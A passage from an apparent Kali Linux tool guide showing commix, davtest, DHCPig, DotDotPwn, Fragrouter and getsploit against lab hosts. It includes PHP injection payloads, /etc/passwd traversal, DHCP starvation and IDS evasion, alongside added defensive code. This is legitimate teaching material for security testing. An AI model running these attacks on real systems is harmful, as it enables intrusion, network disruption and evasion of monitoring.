30).
--retries=RETRIES Retries when the connection timeouts (Default: 3).
--drop-set-cookie Ignore Set-Cookie header from response.
Enumeration:
These options can be used to enumerate the target host.
--all Retrieve everything.
--current-user Retrieve current user name.
--hostname Retrieve current hostname.
--is-root Check if the current user have root privileges.
--is-admin Check if the current user have admin privileges.
--sys-info Retrieve system information.
--users Retrieve system users.
--passwords Retrieve system users password hashes.
--privileges Retrieve system users privileges.
--ps-version Retrieve PowerShell's version number.
File access:
These options can be used to access files on the target host.
--file-read=FILE.. Read a file from the target host.
--file-write=FIL.. Write to a file on the target host.
--file-upload=FI.. Upload a file on the target host.
--file-dest=FILE.. Host's absolute filepath to write and/or upload to.
Modules:
These options can be used increase the detection and/or injection
capabilities.
--shellshock The 'shellshock' injection module.
Injection:
These options can be used to specify which parameters to inject and to
provide custom injection payloads.
-p TEST_PARAMETER Testable parameter(s).
--skip=SKIP_PARA.. Skip testing for given parameter(s).
--suffix=SUFFIX Injection payload suffix string.
--prefix=PREFIX Injection payload prefix string.
--technique=TECH Specify injection technique(s) to use.
--skip-technique.. Specify injection technique(s) to skip.
--maxlen=MAXLEN Set the max length of output for time-related
injection techniques (Default: 10000 chars).
--delay=DELAY Seconds to delay between each HTTP request.
--time-sec=TIMESEC Seconds to delay the OS response (Default: 1).
--tmp-path=TMP_P.. Set the absolute path of web server's temp directory.
--web-root=WEB_R.. Set the web server document root directory (e.g.
'/var/www').
--alter-shell=AL.. Use an alternative os-shell (e.g. 'Python').
--os-cmd=OS_CMD Execute a single operating system command.
--os=OS Force back-end operating system (e.g. 'Windows' or
'Unix').
--tamper=TAMPER Use given script(s) for tampering injection data.
--msf-path=MSF_P.. Set a local path where metasploit is installed.
Detection:
These options can be used to customize the detection phase.
--level=LEVEL Level of tests to perform (1-3, Default: 1).
--skip-calc Skip the mathematic calculation during the detection
phase.
--skip-empty Skip testing the parameter(s) with empty value(s).
--failed-tries=F.. Set a number of failed injection tries, in file-based
technique.
--smart Perform thorough tests only if positive heuristic(s).
Miscellaneous:
--ignore-depende.. Ignore all required third-party library dependencies.
--list-tampers Display list of available tamper scripts.
--alert=ALERT Run host OS command(s) when injection point is found.
--no-logging Disable logging to a file.
--purge Safely remove all content from commix data directory.
--skip-waf Skip heuristic detection of WAF/IPS/IDS protection.
--mobile Imitate smartphone through HTTP User-Agent header.
--offline Work in offline mode.
--wizard Simple wizard interface for beginner users.
--disable-coloring Disable console output coloring.
■ Usage example
# Attempt OS command injection against the following program from the commix-testbed test application
# https://github.com/commixproject/commix-testbed/blob/master/scenarios/regular/GET/preg_replace.php
root@kali:~# commix --url "http://localhost/scenarios/regular/GET/str_replace.php?user=test" --method "GET" --level 1 -v 1
[...]
[02:28:31] [payload] test%29%27%7Dexec%28phpinfo%28%29%29%27%23
[02:28:31] [payload] test%29%27%7Deval%28phpinfo%28%29%29%27%23
[02:28:31] [payload] test%29%27%7Dsystem%28phpinfo%28%29%29%27%23
[02:28:31] [payload] test%27.phpinfo%28%29.%27
[02:28:31] [payload] test%27.exec%28phpinfo%28%29%29.%27
[02:28:31] [payload] test%27.eval%28phpinfo%28%29%29.%27
[02:28:31] [payload] test%27.system%28phpinfo%28%29%29.%27
[02:28:31] [payload] test%7B%24%7Bphpinfo%28%29%7D%7D
[02:28:31] [info] Heuristic (basic) tests shows that GET parameter 'user' might be injectable via (results-based) dynamic code evaluation technique (possible PHP version: '5.5.9').
[...]
Result of actually trying the payload test%7B%24%7Bphpinfo%28%29%7D%7D
davtest
Attempts unauthorized operations such as file creation against a server with WebDAV enabled.
■ Usage
root@kali:~# davtest --help
/usr/bin/davtest -url <url> [options]
-auth+ Authorization (user:password)
-realm+ Auth Realm
-cleanup delete everything uploaded when done
-directory+ postfix portion of directory to create
-debug+ DAV debug level 1-3 (2 & 3 log req/resp to /tmp/perldav_debug.txt)
-move PUT text files then MOVE to executable
-copy PUT text files then COPY to executable
-nocreate don't create a directory
-quiet only print out summary
-rand+ use this instead of a random string for filenames
-sendbd+ send backdoors:
auto - for any succeeded test
ext - extension matching file name(s) in backdoors/ dir
-uploadfile+ upload this file (requires -uploadloc)
-uploadloc+ upload file to this relative location/name (requires -uploadfile)
-url+ url of DAV location
Example: /usr/bin/davtest -url http://localhost/davdir
■ Usage example
root@kali:~# davtest -url http://192.168.11.4/uploads/ -auth admin:admin
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.11.4/uploads
********************************************************
NOTE Random string for this session: vz1C_iC2AlPID
********************************************************
Creating directory
MKCOL SUCCEED: Created http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID
********************************************************
Sending test files
PUT asp SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.asp
PUT html SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.html
PUT jhtml SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.jhtml
PUT txt SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.txt
PUT aspx SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.aspx
PUT pl SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.pl
PUT php SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.php
PUT jsp SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.jsp
PUT shtml SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.shtml
PUT cgi SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.cgi
PUT cfm SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.cfm
********************************************************
Checking for test file execution
EXEC asp FAIL
EXEC html SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.html
EXEC html FAIL
EXEC jhtml FAIL
EXEC txt SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.txt
EXEC txt FAIL
EXEC aspx FAIL
EXEC pl FAIL
EXEC php FAIL
EXEC jsp FAIL
EXEC shtml SUCCEED: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.shtml
EXEC shtml FAIL
EXEC cgi FAIL
EXEC cfm FAIL
********************************************************
/usr/bin/davtest Summary:
Created: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.asp
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.html
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.jhtml
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.txt
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.aspx
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.pl
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.php
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.jsp
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.shtml
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.cgi
PUT File: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.cfm
Executes: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.html
Executes: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.txt
Executes: http://192.168.11.4/uploads/DavTestDir_vz1C_iC2AlPID/davtest_vz1C_iC2AlPID.shtml
DHCPig
Requests IP address leases from a DHCP server while spoofing MAC addresses (DHCP starvation attack).
■ Usage
root@kali:~# dhcpig --help
Usage:
pig.py [-h -v -6 -1 -s -f -t -a -i -o -l -x -y -z -g -r -n -c ] <interface>
Options:
-h, --help <-- you are here :)
-v, --verbosity ... 0 ... no (3)
1 ... minimal
10 ... default
99 ... debug
-6, --ipv6 ... DHCPv6 (off, DHCPv4 by default)
-1, --v6-rapid-commit ... enable RapidCommit (2way ip assignment instead of 4way) (off)
-s, --client-src ... a list of client macs 00:11:22:33:44:55,00:11:22:33:44:56 (Default: <random>)
-O, --request-options ... option-codes to request e.g. 21,22,23 or 12,14-19,23 (Default: 0-80)
-f, --fuzz ... randomly fuzz packets (off)
-t, --threads ... number of sending threads (1)
-a, --show-arp ... detect/print arp who_has (off)
-i, --show-icmp ... detect/print icmps requests (off)
-o, --show-options ... print lease infos (off)
-l, --show-lease-confirm ... detect/print dhcp replies (off)
-g, --neighbors-attack-garp ... knock off network segment using gratious arps (off)
-r, --neighbors-attack-release ... release all neighbor ips (off)
-n, --neighbors-scan-arp ... arp neighbor scan (off)
-x, --timeout-threads ... thread spawn timer (0.4)
-y, --timeout-dos ... DOS timeout (8) (wait time to mass grat.arp)
-z, --timeout-dhcprequest ... dhcp request timeout (2)
-c, --color ... enable color output (off)
■ Usage example
root@kali:~# dhcpig eth0
[ -- ] [INFO] - using interface eth0
[DBG ] Thread 0 - (Sniffer) READY
[DBG ] Thread 1 - (Sender) READY
[--->] DHCP_Discover
[--->] DHCP_Discover
[<---] DHCP_Offer 02:42:ac:13:00:02 0.0.0.0 IP: 192.168.50.2 for MAC=[de:ad:09:6c:90:b2:00:00:00:00:00:00:00:00:00:00]
[--->] DHCP_Request 192.168.50.2
[--->] DHCP_Discover
[<---] DHCP_Offer 02:42:ac:13:00:02 0.0.0.0 IP: 192.168.50.3 for MAC=[de:ad:02:14:dd:5b:00:00:00:00:00:00:00:00:00:00]
[--->] DHCP_Request 192.168.50.3
[--->] DHCP_Discover
[<---] DHCP_Offer 02:42:ac:13:00:02 0.0.0.0 IP: 192.168.50.4 for MAC=[de:ad:1c:4b:c5:94:00:00:00:00:00:00:00:00:00:00]
[--->] DHCP_Request 192.168.50.4
[--->] DHCP_Discover
[...]
[--->] DHCP_Discover
[ -- ] timeout waiting on dhcp packet count 2
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[ -- ] timeout waiting on dhcp packet count 3
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[--->] DHCP_Discover
[ -- ] timeout waiting on dhcp packet count 4
[ ?? ] waiting for DHCP pool exhaustion...
[ -- ] [DONE] DHCP pool exhausted!
DotDotPwn
Runs a variety of directory traversal payloads against a web application.
■ Usage
root@kali:~# dotdotpwn --help
Usage: ./dotdotpwn.pl -m <module> -h <host> [OPTIONS]
Available options:
-m Module [http | http-url | ftp | tftp | payload | stdout]
-h Hostname
-O Operating System detection for intelligent fuzzing (nmap)
-o Operating System type if known ("windows", "unix" or "generic")
-s Service version detection (banner grabber)
-d Depth of traversals (e.g. deepness 3 equals to ../../../; default: 6)
-f Specific filename (e.g. /etc/motd; default: according to OS detected, defaults in TraversalEngine.pm)
-E Add @Extra_files in TraversalEngine.pm (e.g. web.config, httpd.conf, etc.)
-S Use SSL for HTTP and Payload module (not needed for http-url, use a https:// url instead)
-u URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
-k Text pattern to match in the response (http-url & payload modules - e.g. "root:" if trying /etc/passwd)
-p Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword
-x Port to connect (default: HTTP=80; FTP=21; TFTP=69)
-t Time in milliseconds between each test (default: 300 (.3 second))
-X Use the Bisection Algorithm to detect the exact deepness once a vulnerability has been found
-e File extension appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
-U Username (default: 'anonymous')
-P Password (default: 'dot@dot.pwn')
-M HTTP Method to use when using the 'http' module [GET | POST | HEAD | COPY | MOVE] (default: GET)
-r Report filename (default: 'HOST_MM-DD-YYYY_HOUR-MIN.txt')
-b Break after the first vulnerability is found
-q Quiet mode (doesn't print each attempt)
-C Continue if no data was received from host
■ Usage example
# Request header sent to the server being tested for the vulnerability
# The TRAVERSAL part of ?page=TRAVERSAL is replaced with the attack payload
root@kali:~# cat payload.txt
GET /vulnerabilities/fi/?page=TRAVERSAL HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6,zh;q=0.5
Cache-Control: max-age=0
Connection: keep-alive
Cookie: PHPSESSID=oj9u2u36v2fu15c20q52pg33a7; security=low
Host: 192.168.11.4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
# If the response contains "root:", the target is judged vulnerable and the run stops
root@kali:~# dotdotpwn -m payload -h 192.168.11.4 -x 80 -b -p payload.txt -k "root:" -f /etc/passwd
[...]
[+] Report name: Reports/192.168.11.4_09-29-2024_03-17.txt
[========== TARGET INFORMATION ==========]
[+] Hostname: 192.168.11.4
[+] Protocol: N/A
[+] Port: 80
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Appending '/etc/passwd' to the Traversal Strings
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 5514
[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
[*] Payload with: ../etc/passwd
[*] Payload with: ../../etc/passwd
[*] Payload with: ../../../etc/passwd
[*] Payload with: ../../../../etc/passwd
[*] VULNERABLE PAYLOAD:
GET /vulnerabilities/fi/?page=../../../../../etc/passwd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6,zh;q=0.5
Cache-Control: max-age=0
Connection: keep-alive
Cookie: PHPSESSID=oj9u2u36v2fu15c20q52pg33a7; security=low
Host: 192.168.11.4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
[+] Fuzz testing finished after 0.43 minutes (26 seconds)
[+] Total Traversals found: 1
[+] Report saved: Reports/192.168.11.4_09-29-2024_03-17.txt
Result of actually trying the payload /vulnerabilities/fi/?page=../../../../../etc/passwd
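What makes the `?page=` handler above vulnerable is that the user-supplied name is joined to the web root without being confined to it. The function below is an added example, not code from the page or from dotdotpwn: it resolves the requested name under a fixed document root and refuses anything whose normalised path leaves that root. It is fed the payload shapes dotdotpwn's traversal engine generates (plain, URL-encoded, double-encoded, backslash and NUL-terminated variants; the sample list is constructed for the example) and the `WEB_ROOT` value is an assumption.

```python
"""Confine a user-supplied file name to the document root (added example)."""
import posixpath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # assumed document root for the example


def resolve_under_root(root: str, requested: str) -> Optional[str]:
    """Return the absolute path the request maps to, or None if it escapes root.

    The value is percent-decoded until it stops changing (dotdotpwn also sends
    double-encoded forms such as %252e%252e%252f), backslashes count as
    separators (its Windows-style patterns), a NUL byte truncates the name as
    C-based runtimes would, and only then is the path normalised and
    prefix-checked. Stripping "../" substrings instead of normalising is the
    classic mistake: "....//" survives one pass of stripping as "../".
    """
    path = requested
    for _ in range(4):              # undo repeated encoding, bounded
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/").split("\x00", 1)[0]
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, path.lstrip("/")))
    if candidate == root_norm or candidate.startswith(root_norm + "/"):
        return candidate
    return None


def classify(root: str, payloads):
    """Map each payload to the resolved path, or 'blocked' if it escapes root."""
    return {p: (resolve_under_root(root, p) or "blocked") for p in payloads}


# Constructed payloads in the shapes dotdotpwn's traversal engine produces.
SAMPLE_PAYLOADS = [
    "include.php",
    "../../../../../etc/passwd",
    "..%2f..%2f..%2fetc%2fpasswd",
    "%252e%252e%252fetc%252fpasswd",
    "..\\..\\..\\windows\\win.ini",
    "....//....//etc/passwd",
    "../../../etc/passwd%00.php",
    "/etc/passwd",
]

if __name__ == "__main__":
    for payload, verdict in classify(WEB_ROOT, SAMPLE_PAYLOADS).items():
        print(f"{payload!r:40} -> {verdict}")
```

Note that `....//....//etc/passwd` and the absolute `/etc/passwd` are not blocked: after normalisation they name files under the document root (`..../..../etc/passwd` and `etc/passwd` relative to it), which is exactly the confinement wanted. The check is on the final resolved path, so it does not depend on recognising every encoding trick up front; only the decoding steps need to match what the server's own stack does before it opens the file.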
Fragrouter
Converts IP packets into a fragmented data stream and forwards them (to evade the rules of an IDS that cannot correctly process fragmented packets).
■ Usage
root@kali:~# fragrouter
Usage: fragrouter [-i interface] [-p] [-g hop] [-G hopcount] ATTACK
where ATTACK is one of the following:
-B1: base-1: normal IP forwarding
-F1: frag-1: ordered 8-byte IP fragments
-F2: frag-2: ordered 24-byte IP fragments
-F3: frag-3: ordered 8-byte IP fragments, one out of order
-F4: frag-4: ordered 8-byte IP fragments, one duplicate
-F5: frag-5: out of order 8-byte fragments, one duplicate
-F6: frag-6: ordered 8-byte fragments, marked last frag first
-F7: frag-7: ordered 16-byte fragments, fwd-overwriting
-T1: tcp-1: 3-whs, bad TCP checksum FIN/RST, ordered 1-byte segments
-T3: tcp-3: 3-whs, ordered 1-byte segments, one duplicate
-T4: tcp-4: 3-whs, ordered 1-byte segments, one overwriting
-T5: tcp-5: 3-whs, ordered 2-byte segments, fwd-overwriting
-T7: tcp-7: 3-whs, ordered 1-byte segments, interleaved null segments
-T8: tcp-8: 3-whs, ordered 1-byte segments, one out of order
-T9: tcp-9: 3-whs, out of order 1-byte segments
-C2: tcbc-2: 3-whs, ordered 1-byte segments, interleaved SYNs
-C3: tcbc-3: ordered 1-byte null segments, 3-whs, ordered 1-byte segments
-R1: tcbt-1: 3-whs, RST, 3-whs, ordered 1-byte segments
-I2: ins-2: 3-whs, ordered 1-byte segments, bad TCP checksums
-I3: ins-3: 3-whs, ordered 1-byte segments, no ACK set
-M1: misc-1: Windows NT 4 SP2 - http://www.dataprotect.com/ntfrag/
-M2: misc-2: Linux IP chains - http://www.dataprotect.com/ipchains/
■ Usage example
# Start the router on host 2
root@kali_2:~# fragrouter -i eth0 -F1
fragrouter: frag-1: ordered 8-byte IP fragments
# On host 1, route traffic for host 3 via fragrouter (host 2)
root@kali_1:~# ip route add 192.168.11.5 via 192.168.11.4 dev eth0
# Ping host 3
root@kali_1:~# ping 192.168.11.5 -c 1
PING 192.168.11.5 (192.168.11.5) 56(84) bytes of data.
64 bytes from 192.168.11.5: icmp_seq=1 ttl=64 time=0.080 ms
--- 192.168.11.5 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.080/0.080/0.080/0.000 ms
# The log is shown on the fragrouter side
root@kali_2:~# fragrouter -i eth0 -F1
fragrouter: frag-1: ordered 8-byte IP fragments
192.168.11.3 > 192.168.11.5: icmp: type 8 code 0 (frag 27452:8@0+)
192.168.11.3 > 192.168.11.5: (frag 27452:8@8+)
192.168.11.3 > 192.168.11.5: (frag 27452:8@16+)
192.168.11.3 > 192.168.11.5: (frag 27452:8@24+)
192.168.11.3 > 192.168.11.5: (frag 27452:8@32+)
192.168.11.3 > 192.168.11.5: (frag 27452:8@40+)
192.168.11.3 > 192.168.11.5: (frag 27452:8@48+)
192.168.11.3 > 192.168.11.5: (frag 27452:8@56)
# Dump on host 3 (the packet has been split into 8-byte pieces)
root@kali_3:~# tcpdump -n -i eth0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
09:00:34.181539 IP 192.168.11.3 > 192.168.11.5: ICMP echo request, id 14, seq 1, length 64
09:00:34.181567 IP 192.168.11.5 > 192.168.11.3: ICMP echo reply, id 14, seq 1, length 64
09:00:34.436110 IP 192.168.11.3 > 192.168.11.5: ICMP echo request, id 14, seq 1, length 8
09:00:34.436112 IP 192.168.11.3 > 192.168.11.5: ip-proto-1
09:00:34.436113 IP 192.168.11.3 > 192.168.11.5: ip-proto-1
09:00:34.436113 IP 192.168.11.3 > 192.168.11.5: ip-proto-1
09:00:34.436113 IP 192.168.11.3 > 192.168.11.5: ip-proto-1
09:00:34.436114 IP 192.168.11.3 > 192.168.11.5: ip-proto-1
09:00:34.436114 IP 192.168.11.3 > 192.168.11.5: ip-proto-1
09:00:34.436115 IP 192.168.11.3 > 192.168.11.5: ip-proto-1
09:00:34.436128 IP 192.168.11.5 > 192.168.11.3: ICMP echo reply, id 14, seq 1, length 64
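The evasion fragrouter demonstrates works against a monitor that inspects fragments individually or reassembles them differently from the destination host. Below is an added example, not part of fragrouter or of the original page, of the reassembly a monitor has to do: it rebuilds a datagram from pieces that arrive out of order or duplicated (the -F3/-F4/-F5 modes above) and refuses, rather than silently resolving, overlapping pieces whose bytes disagree (-F7 "fwd-overwriting") or datagrams with holes, since different stacks keep different copies and a monitor that guesses wrong is the one that gets evaded. The 64-byte payload and IP id 27452 are taken from the ping log above; `describe()` renders a piece the way that log prints it.

```python
"""Reassemble IP fragments the way a monitor must, to match what the host sees
(added example, not part of fragrouter)."""
from dataclasses import dataclass
from typing import List, Tuple


class ReassemblyError(Exception):
    """Raised when the fragment set cannot be rebuilt unambiguously."""


@dataclass(frozen=True)
class Fragment:
    ip_id: int    # IP identification field shared by all pieces of one datagram
    offset: int   # byte offset of this piece (the header stores offset // 8)
    more: bool    # MF flag: another fragment follows
    data: bytes


def fragment(ip_id: int, payload: bytes, size: int = 8) -> List[Fragment]:
    """Split payload into ordered fragments of `size` bytes (fragrouter -F1 style)."""
    if size % 8:
        raise ValueError("non-final fragment length must be a multiple of 8")
    pieces = [payload[i:i + size] for i in range(0, len(payload), size)]
    return [Fragment(ip_id, i * size, i < len(pieces) - 1, p)
            for i, p in enumerate(pieces)]


def describe(f: Fragment) -> str:
    """Render a fragment as the fragrouter log above prints it: 'frag id:len@off+'."""
    return f"frag {f.ip_id}:{len(f.data)}@{f.offset}{'+' if f.more else ''}"


def reassemble(frags: List[Fragment]) -> bytes:
    """Rebuild the datagram, tolerating out-of-order and duplicate pieces.

    Conflicting overlaps, holes and data beyond the final piece raise
    ReassemblyError so the caller can alert instead of guessing.
    """
    if not frags:
        raise ReassemblyError("no fragments")
    ip_id = frags[0].ip_id
    if any(f.ip_id != ip_id for f in frags):
        raise ReassemblyError("fragments from different datagrams")
    buf = {}          # byte position -> byte value
    total = None      # datagram length, known once the MF=0 piece is seen
    for f in sorted(frags, key=lambda f: f.offset):
        if f.offset % 8:
            raise ReassemblyError(f"offset {f.offset} not a multiple of 8")
        for i, b in enumerate(f.data):
            pos = f.offset + i
            if buf.get(pos, b) != b:     # same position, different byte
                raise ReassemblyError(f"overlap with conflicting data at byte {pos}")
            buf[pos] = b
        if not f.more:
            end = f.offset + len(f.data)
            if total is not None and total != end:
                raise ReassemblyError("two different final fragments")
            total = end
    if total is None:
        raise ReassemblyError("final fragment (MF=0) missing")
    if set(buf) != set(range(total)):
        raise ReassemblyError("hole or data beyond the final fragment")
    return bytes(buf[i] for i in range(total))


def verdict(frags: List[Fragment]) -> Tuple[str, bytes]:
    """('ok', payload) or ('error: ...', b'') for an alerting pipeline."""
    try:
        return "ok", reassemble(frags)
    except ReassemblyError as e:
        return f"error: {e}", b""


if __name__ == "__main__":
    echo = bytes(range(64))                 # 64-byte ICMP payload as in the ping above
    pieces = fragment(27452, echo)          # IP id taken from the fragrouter log above
    for p in pieces:
        print("192.168.11.3 > 192.168.11.5:", describe(p))
    print(verdict(list(reversed(pieces)))[0])                               # out of order: ok
    print(verdict(pieces + [Fragment(27452, 16, True, b"\xff" * 8)])[0])     # conflict: error
```

The point of refusing conflicting overlaps is that the first eight fragments above carry one ICMP message, and a ninth overlapping fragment with different bytes can be "the real data" on one operating system and discarded on another; an IDS that commits to one interpretation is the one the -F7 mode is aimed at. Flagging the datagram, or dropping fragmented traffic at the perimeter where it is not needed, removes that ambiguity.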
getsploit
Searches for and downloads exploits.
■ Usage
root@kali:~# getsploit --help
Options:
-h, --help show this help message and exit
-t, --title Search JUST the exploit title (Default is description
and source code).
-j, --json Show result in JSON format.
-m, --mirror Mirror (aka copies) search result exploit files to the
subdirectory with your search query name.
-c COUNT, --count=COUNT
Search limit. Default 10.
-l, --local Perform search in the local database instead of
searching online.
-u, --update Update getsploit.db database. Will be downloaded in
the script path.
■ Usage example
root@kali:~# getsploit laravel
To use getsploit you need to obtain Vulners API key at https://vulners.com
Please, enter API key: *****************
Total found exploits: 10
Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit+AND+laravel
+----------------------+--------------------------------+------------------------------------------------------------------------+
| ID | Exploit Title | URL |
+======================+================================+========================================================================+
| 2566E785-0AA3-54BD- | Exploit for Unrestricted | https://vulners.com/githubexploit/2566E785-0AA3-54BD-994A-D636B5656220 |
| 994A-D636B5656220 | Upload of File with Dangerous | |
| | Type in Laravel-Admin | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| 17EE6C09-2538-52A3- | Exploit for CVE-2021-3129 | https://vulners.com/githubexploit/17EE6C09-2538-52A3-8C5C-973170ACDF29 |
| 8C5C-973170ACDF29 | | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| 35896337-DA85-5D42- | Exploit for CVE-2021-3129 | https://vulners.com/githubexploit/35896337-DA85-5D42-B9FC-4DF2E3EC881E |
| B9FC-4DF2E3EC881E | | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| F87C6B04-4AFB-5235- | Exploit for CVE-2021-3129 | https://vulners.com/githubexploit/F87C6B04-4AFB-5235-8E72-31C29A8028B5 |
| 8E72-31C29A8028B5 | | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| 272FC334-4DD4-570F- | Exploit for CVE-2021-3129 | https://vulners.com/githubexploit/272FC334-4DD4-570F-AB53-1BF7758BA869 |
| AB53-1BF7758BA869 | | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| CCA6FED9-9A16-59E2- | Exploit for Unrestricted | https://vulners.com/githubexploit/CCA6FED9-9A16-59E2-8C2C-2783C8B3C19A |
| 8C2C-2783C8B3C19A | Upload of File with Dangerous | |
| | Type in Laravel Framework | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| 156C1F8E-E328-5619- | Exploit for CVE-2021-3129 | https://vulners.com/githubexploit/156C1F8E-E328-5619-AAD0-B7C3DF011B08 |
| AAD0-B7C3DF011B08 | | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| 1337DAY-ID-39623 | FleetCart 4.1.1 Information | https://vulners.com/zdt/1337DAY-ID-39623 |
| | Disclosure Vulnerability | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| 7495BDC7-BA22-5D7D- | Exploit for CVE-2021-3129 | https://vulners.com/githubexploit/7495BDC7-BA22-5D7D-92B8-B3FD263480F9 |
| 92B8-B3FD263480F9 | | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
| PACKETSTORM:178770 | FleetCart 4.1.1 Information | https://vulners.com/packetstorm/PACKETSTORM:178770 |
| | Disclosure | |
+----------------------+--------------------------------+------------------------------------------------------------------------+
root@kali:~# getsploit -m laravel
root@kali:~# ls ./laravel
1337day-id-39623.txt 2566e785-0aa3-54bd-994a-d636b5656220.txt 7495bdc7-ba22-5d7d-92b8-b3fd263480f9.txt packetstorm178770.txt
156c1f8e-e328-5619-aad0-b7c3df011b08.txt 272fc334-4dd4-570f-ab53-1bf7758ba869.txt cca6fed9-9a16-59e2-8c2c-2783c8b3c19a.txt
17ee6c09-2538-52a3-8c5c-973170acdf29.txt 35896337-da85-5d42-b9fc-4df2e3ec881e.txt f87c6b04-4afb-5235-8e72-31c29a8028b5.txt
humble
Checks HTTP response headers.
■ Usage
root@kali:~# humble --help
usage: humble.py [-h] [-a] [-b] [-df] [-e [TESTSSL_PATH]] [-f [FINGERPRINT_TERM]] [-g] [-grd] [-l {es}] [-lic] [-o {csv,html,json,pdf,txt}]
[-op OUTPUT_PATH] [-r] [-s [SKIP_HEADERS ...]] [-u URL] [-ua USER_AGENT] [-v]
options:
-h, --help show this help message and exit
-a Shows statistics of the performed analysis; will be global if the '-u' parameter is omitted
-b Shows overall findings; if this parameter is omitted detailed ones will be shown
-df Do not follow redirects; if this parameter is omitted the last redirection will be the one analyzed
